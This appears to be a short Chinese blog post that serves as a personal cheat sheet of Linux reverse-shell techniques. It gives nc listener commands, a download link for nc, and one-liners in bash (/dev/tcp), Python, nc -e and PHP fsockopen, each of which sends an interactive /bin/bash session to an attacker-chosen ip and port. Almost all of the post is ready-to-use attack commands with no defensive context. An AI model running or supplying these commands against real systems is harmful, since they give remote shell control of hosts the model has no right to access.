渗透安全

Linux 几种反弹shell方式

2019-08-02  本文已影响169人  Cyc1e

写简单些给自己用的,省得每次记不住都得靠度娘
接收端主机利用nc监听端口

Windows:nc -l -v -p 8888
Linux:nc -lvvp 8888

放个nc: https://pan.baidu.com/s/1B0jehdcst5aYR0HLbXSM9w 提取码: 9vya

0x01 bash

bash -i >& /dev/tcp/ip/port 0>&1

0x02 python

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

0x03 nc

#看nc版本,有的nc没有-e参数
nc -e /bin/bash ip port

0x04 php

php -r 'exec("/bin/bash -i >& /dev/tcp/ip/port 0>&1");' #这个测没成,先留着调调再说
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i 0>&3 1>&3 2>&3");' #Centos
上一篇下一篇

猜你喜欢

热点阅读